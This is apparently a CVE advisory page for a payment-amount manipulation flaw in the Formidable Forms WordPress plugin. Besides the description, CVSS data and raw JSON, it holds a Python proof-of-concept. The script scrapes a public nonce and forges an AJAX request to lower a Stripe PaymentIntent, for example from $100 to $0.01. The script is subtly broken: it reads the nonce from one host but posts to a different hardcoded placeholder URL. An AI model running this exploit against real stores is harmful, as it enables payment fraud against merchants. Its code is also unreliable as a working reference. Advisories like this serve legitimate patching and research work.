Security Vulnerability Report
CVE-2026-2888 CVSS 5.3 MEDIUM


Published: 2026-03-13 19:54:35
Last Modified: 2026-04-22 21:30:26

Description

The Formidable Forms plugin for WordPress is vulnerable to an authorization bypass through user-controlled key in all versions up to, and including, 6.28. This is due to the `frm_strp_amount` AJAX handler (`update_intent_ajax`) overwriting the global `$_POST` data with attacker-controlled JSON input and then using those values to recalculate payment amounts via field shortcode resolution in `generate_false_entry()`. The handler relies on a nonce that is publicly exposed in the page's JavaScript (`frm_stripe_vars.nonce`), which provides CSRF protection but not authorization. This makes it possible for unauthenticated attackers to manipulate PaymentIntent amounts before payment completion on forms using dynamic pricing with field shortcodes, effectively paying a reduced amount for goods or services.

CVSS Details

CVSS Score
5.3
Severity
MEDIUM
CVSS Vector
CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:L/A:N

Configurations (Affected Products)

No configuration data available.

Formidable Forms plugin for WordPress, all versions up to and including 6.28

PoC / Exploit Code

⚠ For Security Research Only
The following code is for security research and authorized testing only.
python
import json
import re
import requests

# CVE-2026-2888 PoC - Formidable Forms Payment Manipulation
# This PoC demonstrates how an unauthenticated attacker can manipulate payment amounts

TARGET_URL = "https://vulnerable-site.com/wp-admin/admin-ajax.php"


def get_nonce(site_url):
    """Extract the publicly exposed nonce from page JavaScript"""
    response = requests.get(site_url)
    # Extract frm_stripe_vars.nonce from page source
    match = re.search(
        r'frm_stripe_vars\s*=\s*\{[^}]*nonce:\s*"([a-zA-Z0-9]+)"',
        response.text,
    )
    if match:
        return match.group(1)
    return None


def exploit_payment_manipulation(site_url, form_id, original_amount, manipulated_amount):
    """
    Exploit the authorization bypass to manipulate PaymentIntent amount
    """
    nonce = get_nonce(site_url)
    if not nonce:
        print("[-] Failed to extract nonce")
        return False
    print(f"[+] Extracted nonce: {nonce}")

    # Construct malicious payload with manipulated amount
    payload = {
        "action": "frm_strp_amount",
        "nonce": nonce,
        "form_id": form_id,
        "payment_amount": manipulated_amount,  # Attacker's chosen amount
        "entry_id": 0,  # New entry
        "fields": json.dumps({
            "field_123": manipulated_amount  # Manipulated field value
        }),
    }

    try:
        response = requests.post(
            TARGET_URL,
            data=payload,
            headers={
                "Content-Type": "application/x-www-form-urlencoded",
                "X-Requested-With": "XMLHttpRequest",
            },
        )
        result = response.json()
        if result.get("success"):
            print(f"[+] Successfully manipulated payment from ${original_amount} to ${manipulated_amount}")
            print(f"[+] Response: {json.dumps(result, indent=2)}")
            return True
        else:
            print(f"[-] Exploitation failed: {result}")
            return False
    except Exception as e:
        print(f"[-] Error: {e}")
        return False


if __name__ == "__main__":
    site = "https://target-formidable-site.com"
    # Example: Change $100 to $0.01
    exploit_payment_manipulation(site, form_id=5, original_amount=100, manipulated_amount=0.01)

References

https://plugins.trac.wordpress.org/browser/formidable/tags/6.28/stripe/controllers/FrmStrpLiteHooksController.php#L88
https://plugins.trac.wordpress.org/browser/formidable/tags/6.28/stripe/models/FrmStrpLiteAuth.php#L322
https://plugins.trac.wordpress.org/browser/formidable/tags/6.28/stripe/models/FrmStrpLiteAuth.php#L402
https://plugins.trac.wordpress.org/changeset?sfp_email=&sfph_mail=&reponame=&new=3480574%40formidable%2Ftrunk&old=3460198%40formidable%2Ftrunk&sfp_email=&sfph_mail=
https://www.wordfence.com/threat-intel/vulnerabilities/id/b8be3b6e-a035-4e6f-ba2b-ce9e59ebf2e0?source=cve

Raw JSON Data

JSON
{"cve": {"id": "CVE-2026-2888", "sourceIdentifier": "[email protected]", "published": "2026-03-13T19:54:34.707", "lastModified": "2026-04-22T21:30:26.497", "vulnStatus": "Deferred", "cveTags": [], "descriptions": [{"lang": "en", "value": "The Formidable Forms plugin for WordPress is vulnerable to an authorization bypass through user-controlled key in all versions up to, and including, 6.28. This is due to the `frm_strp_amount` AJAX handler (`update_intent_ajax`) overwriting the global `$_POST` data with attacker-controlled JSON input and then using those values to recalculate payment amounts via field shortcode resolution in `generate_false_entry()`. The handler relies on a nonce that is publicly exposed in the page's JavaScript (`frm_stripe_vars.nonce`), which provides CSRF protection but not authorization. This makes it possible for unauthenticated attackers to manipulate PaymentIntent amounts before payment completion on forms using dynamic pricing with field shortcodes, effectively paying a reduced amount for goods or services."}, {"lang": "es", "value": "El plugin Formidable Forms para WordPress es vulnerable a un bypass de autorización a través de una clave controlada por el usuario en todas las versiones hasta la 6.28, inclusive. Esto se debe a que el gestor AJAX `frm_strp_amount` (`update_intent_ajax`) sobrescribe los datos globales `$_POST` con entrada JSON controlada por el atacante y luego utiliza esos valores para recalcular los importes de pago a través de la resolución de shortcode de campo en `generate_false_entry()`. El gestor se basa en un nonce que está expuesto públicamente en el JavaScript de la página (`frm_stripe_vars.nonce`), lo que proporciona protección CSRF pero no autorización. 
Esto hace posible que atacantes no autenticados manipulen los importes de PaymentIntent antes de la finalización del pago en formularios que utilizan precios dinámicos con shortcodes de campo, pagando efectivamente una cantidad reducida por bienes o servicios."}], "metrics": {"cvssMetricV31": [{"source": "[email protected]", "type": "Secondary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:L/A:N", "baseScore": 5.3, "baseSeverity": "MEDIUM", "attackVector": "NETWORK", "attackComplexity": "LOW", "privilegesRequired": "NONE", "userInteraction": "NONE", "scope": "UNCHANGED", "confidentialityImpact": "NONE", "integrityImpact": "LOW", "availabilityImpact": "NONE"}, "exploitabilityScore": 3.9, "impactScore": 1.4}]}, "weaknesses": [{"source": "[email protected]", "type": "Secondary", "description": [{"lang": "en", "value": "CWE-639"}]}], "references": [{"url": "https://plugins.trac.wordpress.org/browser/formidable/tags/6.28/stripe/controllers/FrmStrpLiteHooksController.php#L88", "source": "[email protected]"}, {"url": "https://plugins.trac.wordpress.org/browser/formidable/tags/6.28/stripe/models/FrmStrpLiteAuth.php#L322", "source": "[email protected]"}, {"url": "https://plugins.trac.wordpress.org/browser/formidable/tags/6.28/stripe/models/FrmStrpLiteAuth.php#L402", "source": "[email protected]"}, {"url": "https://plugins.trac.wordpress.org/changeset?sfp_email=&sfph_mail=&reponame=&new=3480574%40formidable%2Ftrunk&old=3460198%40formidable%2Ftrunk&sfp_email=&sfph_mail=", "source": "[email protected]"}, {"url": "https://www.wordfence.com/threat-intel/vulnerabilities/id/b8be3b6e-a035-4e6f-ba2b-ce9e59ebf2e0?source=cve", "source": "[email protected]"}]}}